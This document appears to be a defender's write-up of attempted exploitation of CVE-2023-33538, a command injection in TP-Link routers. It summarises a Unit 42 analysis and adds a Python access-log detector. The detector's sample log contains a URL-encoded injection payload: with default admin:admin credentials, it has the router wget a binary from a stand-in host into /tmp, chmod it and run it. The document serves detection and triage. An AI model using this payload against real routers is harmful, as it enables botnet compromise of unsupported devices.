A Deep Dive Into Attempted Exploitation of CVE-2023-33538
Unit 42 analyzes active exploitation attempts against CVE-2023-33538, a command-injection flaw in the /userRpm/WlanNetworkRpm(.htm) endpoint on several end-of-life TP-Link routers where the ssid1 parameter is passed to the system without proper sanitization. The observed attacks used HTTP Basic Auth with default admin:admin credentials and injected shell commands to wget an ARM ELF payload into /tmp, chmod 777 it, and execute it with a tplink argument, matching Mirai/Condi-style botnet tradecraft. By emulating TL-WR940N firmware and reversing the downloaded arm7 binary, the researchers found the malware implements a C2 command loop, heartbeat handling, lockdown logic, and an HTTP-server-based update path, but also determined the specific exploit attempts seen in telemetry were flawed and would not succeed as written. The practical takeaway is that the vulnerability is real and still exploitable on unsupported devices, but successful compromise depends on authenticating to the web interface, making default or weak router credentials the key enabling factor.
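From a defender's side, the attack pattern described above (requests to the `/userRpm/WlanNetworkRpm` endpoint whose `ssid1` value carries shell metacharacters, sent with Basic Auth using the factory `admin:admin` credentials) is easy to pick out of router or reverse-proxy access logs. The following detector is an added example, not code from Unit 42 or from the report; it assumes a constructed log format (the usual "combined" fields plus one extra quoted field holding the `Authorization` header) and uses made-up addresses and an `example.invalid` download host in its sample lines.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (hypothetical format: "combined" fields
# followed by one extra quoted field with the Authorization header, or "-").
# Line 1: a legitimate SSID change with default credentials.
# Line 2: the injection pattern described in the report, authenticated as admin:admin.
# Line 3: an injection probe rejected with 401 because no credentials were supplied.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeWifi&Save=Save HTTP/1.1" 200 512 "-" "Mozilla/5.0" "Basic YWRtaW46YWRtaW4="
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid1=x%3Bwget%20http%3A%2F%2Fexample.invalid%2Farm7%20-O%20%2Ftmp%2Farm7%3Bchmod%20777%20%2Ftmp%2Farm7%3B%2Ftmp%2Farm7%20tplink&Save=Save HTTP/1.1" 200 512 "-" "Wget/1.21" "Basic YWRtaW46YWRtaW4="
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /userRpm/WlanNetworkRpm.htm?ssid1=x%7Cid HTTP/1.1" 401 0 "-" "curl/8.0" "-"
"""

# Parser for the constructed log format above.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<auth>[^"]*)"$'
)

# The vulnerable endpoint is served both with and without the .htm suffix.
VULN_PATH_PREFIX = "/userRpm/WlanNetworkRpm"

# Shell metacharacters that have no business inside an SSID; their presence
# indicates an attempt to terminate the argument and append further commands.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(")


def decode_basic_auth(field):
    """Return (user, password) from a 'Basic <base64>' header value, else None."""
    if not field.startswith("Basic "):
        return None
    try:
        raw = base64.b64decode(field[6:], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def is_injection_attempt(ssid):
    """True when the (URL-decoded) ssid1 value contains shell metacharacters."""
    return bool(SHELL_META_RE.search(ssid))


def analyze_line(line):
    """Return a finding dict for requests to the vulnerable endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not target.path.startswith(VULN_PATH_PREFIX):
        return None
    # parse_qs percent-decodes, so encoded ';' and '|' are visible to the check.
    params = parse_qs(target.query, keep_blank_values=True)
    ssid = params.get("ssid1", [""])[0]
    injection = is_injection_attempt(ssid)
    default_creds = decode_basic_auth(m["auth"]) == ("admin", "admin")
    status = int(m["status"])
    if not injection:
        verdict = "benign"
    elif status == 200:
        # The router accepted the request: the injected string reached the handler.
        verdict = "injection-authenticated"
    else:
        # Authentication failed, so the payload never reached the vulnerable code.
        verdict = "injection-rejected"
    return {
        "src": m["src"], "ssid1": ssid, "injection": injection,
        "default_creds": default_creds, "status": status, "verdict": verdict,
    }


def analyze_log(text):
    """Run analyze_line over every line and keep only the endpoint hits."""
    return [f for f in (analyze_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['src']:>15}  {f['verdict']:<24} "
              f"default_creds={f['default_creds']}  ssid1={f['ssid1']!r}")
```

The verdict split matters for triage: a request that carries metacharacters but drew a 401 is reconnaissance noise, while a 200 with default credentials means the injected string reached the handler, which is exactly the condition the report identifies as the enabler of a successful compromise. The `default_creds` flag is worth alerting on even for benign-looking requests, since it shows the device is still on factory credentials.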